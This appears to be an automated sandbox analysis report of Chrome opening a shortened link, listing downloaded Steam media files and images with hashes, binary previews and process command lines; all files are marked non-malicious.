....=e..@...Z..t.H,...=....f....7.......+.../o..........B.N......nL..>.S..L...i.x.G...,....d..D.g6...J.Q-.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:data
        Category:downloaded
        Size (bytes):1048576
        Entropy (8bit):7.9966003601707705
        Encrypted:true
        SSDEEP:24576:AiRMCEMLRNFnubg2q5gcigycWwBMVl+VC3:AiRLRr2q5rvWrVll3
        MD5:EA1F51F32332628D06024C836E966299
        SHA1:9C4B119535EC38A0F2130C2761C70A4A13C0184C
        SHA-256:6AE8AC8A5246B803A400CB5CE3E2C3C727F1347165D33C70879F0A5783CBBF9A
        SHA-512:F95A9B3A4179E6142BB53F27B0B2816494C704BC0D16ECEF678E168C62B379FB807A8FDB350A89E49C00A5547351956BE686E35E2B850EB0F3069C8AE40D6EB2
        Malicious:false
        Reputation:low
        URL:https://cdn.cloudflare.steamstatic.com/steam/apps/256923250/movie480_vp9.webm?t=1705420839:2f77e582f0cba3:3
        Preview:..X'.k.T4.V/D...wy.......%....W{@^...ls4.?.o.r=.~.>.YX.>sy-.....Z.(dp<....!..n..2.....eu.Q..S}.E1t..o=M.)63Bt<.n..Mk..KH....h..@}u...*W..j..r.Qi.....HeW..3`.Y.Zx..N....jU.M...;2x7e.FI.s........Fv.+,."q..5.Jt...\L8!.o.|XAt.....E7..1MX.J...w....bo].n....Q...."...50..D..Xk...;A.....6P.I./..Y.9..8_..q..)'..Pzd.a#.G<.N.n."...Q._.X.l..]n5.[.v...D.P...U...?........./w.L..Nk.T..".M.[.sDzR...^....D.....r......]..?....$......K...n.x...7B.0By...K.p..c....C.....<.e..X.&.....j|l.....0S.(.."D2.\.$.9.+I.....~.....%..j....m.>..g&..b.gn.L=0f....nR.....( m.9hX.}/...$..L ....a.8.....B|..X.-....\.....h..{.\'D.i....^,_d.7...Wt.;.. D<X...[.7.w.....[.l...U.5.Q...L.K..^..`.......y`.{........?.Xu.0.D.3....!.:^{..\7..^V`d.b%.j..o,x.eJ>%...!.L.W......"}5f.L..8j'..M{D....L..._.a.|/M..u..0....X.e+.e..Au...8..R...0..).W.~_.......|%....N.{..A.Oy.p..?s..%..E..'.5.N>B[..S...:L?..@8.d.+n.Il0..H.1.<.V.....2.DD(C..,..h.8.a:.......F.....X..UD........!.n.#....+....e.b.1.X07.tx
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:data
        Category:downloaded
        Size (bytes):1048576
        Entropy (8bit):7.998872231921411
        Encrypted:true
        SSDEEP:24576:R3Q3u2vc5tMBs/b047ofBlzLyiZMvY7Q2/PWND2cK:JQ3u352BJ48DfOvqQMgD2J
        MD5:0DFE3117590CB78FA434B9B6D31A38B6
        SHA1:B6DE814C60AF397FEFC64E0FC3E038B995462007
        SHA-256:089F4E4F1BEB6208CCBF7963F44B08C7E681E59E12CC0623F1110425DD4D457A
        SHA-512:3543BE401C9ADA8336F93215048CD2B2326350B60DA52DF958013CDEE5059FE3C07CF4671D1BC63575DFE0A5A1617BDA2EC0BD7D20FAF6850D237D49656EC2E7
        Malicious:false
        Reputation:low
        URL:https://cdn.cloudflare.steamstatic.com/steam/apps/256923250/movie480_vp9.webm?t=1705420839:2f77e582f0cba3:5
        Preview:.......+.G.S.UlJ...z+.P_.._]..O..lb`@H....5....6.9.M.Dq%h..^].@s....2...7.u&I..7.~..au{...>&7*..Uv9...Od..{q......./Z..1)>VC(E..;.......rU..qk|.F[YS.X%..'.'..N..F...............]..."....m./..B...|.q<.M.._...*...Z....O.....~49C..J3......T5..6.4....=.$...?.A.wHn0.]..C.b8.-vf.......Y.?.._A.)..`.[E*|...(t.P..'}20+.Y0.....VS..{y..q.J..)...K\./z*...T...H...~H...h(. b.r...e....eL..k....xr..x/<hP...oi.)H..-...f\d .}A..A=5..'........k`<.Q.qS..?U'.O....G.ZR.X...Nlg......^N...O6....l.x....c..33.e..f.Q.y.8q.7+.d...8.w.h..b.u#1D...Y.@z..M....K...../..<.t!/.$....e...|I.......\.7.6F...tq.......RB....s...h..1....UC.....%V.4t..w.1gj..Ym..*.'.SD.(...)w..S...I...a....r..CBU.e...Q.m.....l.g.C9..tLZ_.5/.X...#...9..|...3NT=.N..PLg1!<./.>..x.\.z....?/..8"8j.2(8.....ZT...W9...p.......i(....x...I..............t..}.j..-$8A\...v....3o%e..s.-....#......e..r......VB.....m...#...92e.Zo....R....|T...m..|;$OT.j....w.P...M...<.t..I`..|........T...K|......n\...4..l..OWp..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 460x215, components 3
        Category:downloaded
        Size (bytes):49014
        Entropy (8bit):7.962416989552969
        Encrypted:false
        SSDEEP:768:4ZgDk5nwJ2uZ3zXYnOFUGLdqhMDYGUd2ALVknp/ZudsgAgP3ok1nxlSNznkApFkp:EgDk5w4uhXYOwhR/2p/OPfnxlShnkApe
        MD5:6AD2044C9E73B61D5413DD1FFBD73ED6
        SHA1:3529AD86D9D88403288E288DE977236D084C7B0A
        SHA-256:97F548FF76603E3435EEB96EA39336BDE8F0422BC15F830D274E1B4E7CDD2836
        SHA-512:01DAC9EA11FCFAA922608A7B573F6A33433BF2957E7C7CAE995B26178FC0B379979BBA358BDD1732DC5A18FE880E43FEEDB009D3B98FB08F2416DB46D2738B0B
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/subs/626153/header_ratio.jpg?t=1636655194
        Preview:......JFIF.............C....................................................................C......................................................................................................................O.........................!1.A.."Qa.q.2.#B....3....Rb...$c..%Cr.....&'4S.56u..................................;.......................!1..AQaq........."R..23..#B.4b$5CD............?...R..I...Q..6..L@..$.#c....<.....h...S$.'x....... ....X0.q.w..Q...$...I..>{m...ib.`R.O..q......,B~P...;|s.p* .P.:.J......n}.,.i!...Ibc...bw..Ts)`..*(.......|......pC.{....Rc.y.P...DKv.?..`....nN.I.3;..v...B.iJt.$...L(......lH.).F...`.....y..`{Qj`..n.6.L.=.F$..............w..IDR..Q.F..G~~.o...J.i..1.......&.HE.IX][.......(.P.........s.. O..Y....;.v.......Tg......j..O.h...(9UQ._.a|...][....&F..H..3...I.D.#Q..#~N.\....,..`m.....>..p.F...AL.:..WP2....v'a..o.X..Z...4..i- .!..=.[i...bG)..K .u.!L.!A*w./"w'..=MMK......T.}E..&`.?. ...U..%...;...O.2......:.QjJ.4...A {...`d`.S....BJ..]$Oo.7.m..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 600x337, components 3
        Category:downloaded
        Size (bytes):43891
        Entropy (8bit):7.955158555503602
        Encrypted:false
        SSDEEP:768:uRF24qNGVIg5S5tfBHi3SIp+BysJfFnxYbFjSUkMR6jMvraH5aWGu1zlLp:ujKNguRHIcysJf8PyUaZfGmzj
        MD5:346387C6D90B53C9F4A036B9D8F1233C
        SHA1:EE44FB9C07C1F77B865FB060608F6685B22AAD10
        SHA-256:2802FEB08CFB4204634A8654D7199EA00500D474DBA23D68F29688DEF5305478
        SHA-512:4AB1FA6ABD55AD9BF136C7110BDC0717272A9FB8EDAB686CE8D9F18C7980452891EA4A61288F3CA1B589C5AA7700D825D0745719E65A3164618BD99CACBF5FF5
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/1085660/ss_c142f5078ace9f5e2eb2c80aa3bf768e156b4ee9.600x338.jpg
        Preview:......JFIF.............C....................................................................C.......................................................................Q.X............................................G.......................!..1AQ.."a.2q.....#BR...3..$4br..5s....CDSc.................................5.......................!1.AQ."aq..2......B..#..R$3b............?....kb...&.....IOZ.jSL...&.D.. .ny...)4.{h.jo...( ....6.B.&.(.V..z..$Pd.|...h.$..Ha.v..LA..a...b..4.f..h....M.d.@p;..LbD*:.R..Ah".R.A.Ham..3.;P.m..`F(...k......!!=.@...i.knh.6....H).3<.,.P..........4..[$..h..,(....'...2CB}8.zCF.I1......'.2X>.(.Y.&...|...d7..\mX1&#.-.)S$.@mJp.$..fLT.......*S....g...f......8 .........F.@...I.=r[.mJ[...l.=.Z(...Ht%.R....t..V.y.....}.7E.Z.N.$.....w...}..D...8..Er.)0j.8..1..B..{.).R!T......M.-I...YM.j"..;...;.......ZTU.V$...iPX.(....09....Ji.t..@..zt+..0....4.L.`......1.....Jf..=-.`..#3.P....U.......+.).'..H.*=.(jZ.4.A)'8.0K}x..2.E...Vh"...tM.i..j.....L...tHcH]..CiT.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 292x136, components 3
        Category:downloaded
        Size (bytes):20903
        Entropy (8bit):7.976903648149348
        Encrypted:false
        SSDEEP:384:xHP8wMSlwZzX/19SHilmD6byuE9enykvDtKrEY5YD6Urzy:6SlwJtgHGJyzM9xKwY5YD9ny
        MD5:1B46842FFDAE52A3146AA7C7B0403C17
        SHA1:72D9C4017DCA525511663E2B3D950E87F793AF2F
        SHA-256:80D33547731442C41B67404B2F37DEACD6B75728A2FB30E9C25D7205492B48B2
        SHA-512:0199BA892F893FFA035EE39977E2AC75DE3F8F2A6617BAA99711FD1F63A56E9D9796B3960B8BBBC488D87FF4623637CF19C0B9B5704FBD5702C2CEB012D84BD3
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/1812450/header_292x136.jpg?t=1714149072
        Preview:......JFIF.............C....................................................................C.........................................................................$............................................A..........................!1A.."Q..a#2q...B.....R....3r.$Cb.%4.................................3.......................!1.A.Qa"2q........#..B$3.R............?..."....y.qR...l.=...n.(0J..dn...TO.A.j*z.8O..>.g$.16.<.q.n..9G..1. X.^...3Y.3...).....F..!&.A^W.`/...ok.m..3..O..E.k.N.4..R.h..,H,. ........8.PO..H./..AU..TY.u.!..Bj.....).6.r.._.{..n.c..}E..7.U...<.Q+.f...;X@..7.M.~.........Cl.!..(.Z....@........N..X1.>[.^8..$.......\_.~...&(...3p2..E..3.B>...b|V.i..+..4.H....#..QCv.....:.q.7.c...]=V..B.G1..Q.......e..zv..:....9P.o....$...1D} ._..u.D.Z.....E..a..pD.i*Z..O...>.\MJ....t....c.]...'.F.....:D........I.....=N.y..5O.y.....O.d=..[.U}.lx=..8..%u.{.f~.B.(...*..5)..;l;...#.I.R...h..,6..`7.;.{{b. ..6...[{bB.e.qT.f..=F"..V*.I.)C.F...+.P.z......80..R....k..|s
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 115x65, components 3
        Category:dropped
        Size (bytes):3900
        Entropy (8bit):7.871408199926127
        Encrypted:false
        SSDEEP:48:vVXl6WEqqgBlS4npcoY3JRT6SFaLi84Is5oB9O8k+RibWkx9UhFVU4OEus/ujWBj:vJo1OdnpcP5Zg6Eibvoh3bequjOvEej
        MD5:885B980323E687BE376BB4547B1BD8BF
        SHA1:DB9788818F04603DB83FCB83B6DCF7BD227FECC2
        SHA-256:2A57CB8563CFB988EF6F137E98AF4DD8EF4E73CBAC7B0D1F207306928B56E157
        SHA-512:A3D2C1CB9FFE7669FC10DD747AE8401466C53FD5FCB6A254F586B05A2B9A05B2F45666016AEE753B5DCB378BB2F1E64BE8F4D80895B17292BAEA4002D0DEB1C2
        Malicious:false
        Reputation:low
        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................A.s...........................................E..........................!.1A."Qq2a......#Br..345Rbs.$.....6St...................................3.......................!1AQ."q.2a...BC...#3R.................?.Y..ow....,p.hu..r..6.9$..E.-.......E.v....*.8....{q.Q..)?.rv6."*LbD.B.\.....T.m..<...?y....U...Ym*.^e.q...qo8}..|p.7......?....?...l.A.&:E...1.....'.Q.........o.2<..^....1.I.VZm.R....b...6.v.......h.....I.;u.......'..m.a6O..P.....,..B.O.%....X{..E...r|....jfg.N...c.>.E.P...F...%.67..*.....70NR....e.U}.B,-a..+..)..m..Rfl......G..v..k.c.....*..........5...J....C...a..v.B.k..0.........R..w...\l..?(.EHR*N.]......R.._..........|...T.....uJ.$..i>.g.'..*Z.L/._...~....>.k)....u`{e...~..Rt..3+.<.Y..@.....qj.........h..4....M....%....H^r}EJ.F._.dT.I.=..2K.u^.......q...`.J....wi....zJ..X.....T)..$8.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 616x353, components 3
        Category:dropped
        Size (bytes):64237
        Entropy (8bit):7.951636807269081
        Encrypted:false
        SSDEEP:768:ekmOsLYOyjI/Gn2+Bthjt1xvYVzmgwDxaHUWQ+XDOYyO+BcQgcK42MoIDBcf6C2o:FsHynfLZizmgw34O3cC95DB26Ca4
        MD5:C96FCF0CDBF68806A49770174811F320
        SHA1:0BCD897ADEF4B4A45A4EC91F8F37495C79CEFA18
        SHA-256:47F02AC4DC3E55FA3F916F05DCEBB0E748EBB73AB459F3ABD22537E1E2B22C2F
        SHA-512:64EF7A8805ECD4AD40B82E8A2460E286AB8FFA80B063764D9411DE51D4D41289D65438A6721B2580F5CA9A98FDC27FBB93B53795F82C877DE21E8FEF0481A181
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.......................................................................a.h............................................b..........................!1.AQ..."aq.2....B........#RU...$3Wbr..&4Vs....CSTu...68...%'57Dct....................................J........................!1A....Qq...."Sa......2..$BR#TUbr.%34...&5...Ccs............?...a.]X..b.B.K...x..{8S..Wy.X<.......+-.<...b.qC/......<..rK.f..]1..................W...^I...8rp...%...\.s.9..p........... .k... ..J_D7D..>..._7N...0...0....T....... ..p.B..o.}....%k...d.'3.!..w.........HH$..S.E.BiR..\.o.....5...@..J}7...ja....Uk....j..'t..d.i..i..Q......>..|.50.L...*....~.@..)92[4.....H.Q....\..y..sS.$..j..Ze...#.N.I.J. ....-S'.:C.....&A.]...U...I...wU...LJ. .,..'zw..g.|.`..N]...K.T..0...a2..Y.w......UUJ...S=b\.(3..h..I=.Bs.89..-Y:p.I.A]..y....x-..Fp8..*.w'&O .....g..c.....==.b.#.|..8,,0..U....dh.v...^%..js....w..IK@..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 184x69, components 3
        Category:dropped
        Size (bytes):5605
        Entropy (8bit):7.901001607711293
        Encrypted:false
        SSDEEP:96:/CA5+aN68CwIqOUXDduBNZhyoxeaztEYYaV3zeiJv5uYbfILMtBPk:KG7BxmNPyoxeazGQLvQjj
        MD5:B625FAA46A58221DC1D696348B658299
        SHA1:747CF78156F8C397BF4325F9C614D883E6F034A8
        SHA-256:1D1A6C9477DAC11EDE660D1BD2A3F28447AADDDDEFF96047E79A106F636CE0EF
        SHA-512:F0B4BC7BA147FA8B86ABB6C69C4F22E38A515D8EF97F27EFB8EAB638070B74756EA19846468265A6E2CCA5A6F87B947D35D848EAB2B9B7582873D1057407FF3A
        Malicious:false
        Reputation:low
        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................E..............................................J..........................!.1..AQ."aq....#2..3B.....$&4R...%'6CETbc........................................................!1A."2Qa............?..t...}u`..+8..u.....mT...@f.s..`t....$.=t...1.I....#.G.9.x.C..?m..(.(....L.i ....:bR.GR.H.....C..#.....L4='8..L4=<r8..{.'..x...5.c.PA....n5#0.o...q...&...V-KfO.e.9......<S..}...=.i..}..}5|..u.........4....P. ..h.iIS....JH..p.$.X.5.W#._......).T...Om..{`))...X.x...K....)W..5...3......K.(...rG>..8...p..{..?..s.U..o.;.~.P...4.G.{f....l....EM/%.$Kz7.0.ISn$.T.'.....U.+......u.X...i.Z\f....Gy.c.du...T.4.....x.1..b...Un8.\...h.&..2.b....?..h-.R.V[.@.z.BIhxi..5.t..@n,(.(.).....".....w..P#ENS.z..#....u<9R6.[z5...6..t.....).-....K]-....e..).x........h......M2_b8m.MH...D..@fq..1K.K.o'.Hz..x`.J..I...Ji.Nq....2..9
        No static file info
        Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.

        Click to jump to process

        Click to jump to process

        Click to jump to process

        Target ID:0
        Start time:18:58:21
        Start date:25/05/2024
        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
        Wow64 process (32bit):false
        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
        Imagebase:0x7ff715980000
        File size:3'242'272 bytes
        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:low
        Has exited:false

        Target ID:2
        Start time:18:58:25
        Start date:25/05/2024
        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
        Wow64 process (32bit):false
        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 --field-trial-handle=2200,i,16015662976217930390,16343968462784890998,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Imagebase:0x7ff715980000
        File size:3'242'272 bytes
        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:low
        Has exited:false

        Target ID:3
        Start time:18:58:28
        Start date:25/05/2024
        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
        Wow64 process (32bit):false
        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://surl.pk/rUrcX"
        Imagebase:0x7ff715980000
        File size:3'242'272 bytes
        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:low
        Has exited:true

        Target ID:6
        Start time:18:58:53
        Start date:25/05/2024
        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
        Wow64 process (32bit):false
        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3112 --field-trial-handle=2200,i,16015662976217930390,16343968462784890998,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Imagebase:0x7ff715980000
        File size:3'242'272 bytes
        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
        Has elevated privileges:false
        Has administrator privileges:false
        Programmed in:C, C++ or other language
        Reputation:low
        Has exited:false

        No disassembly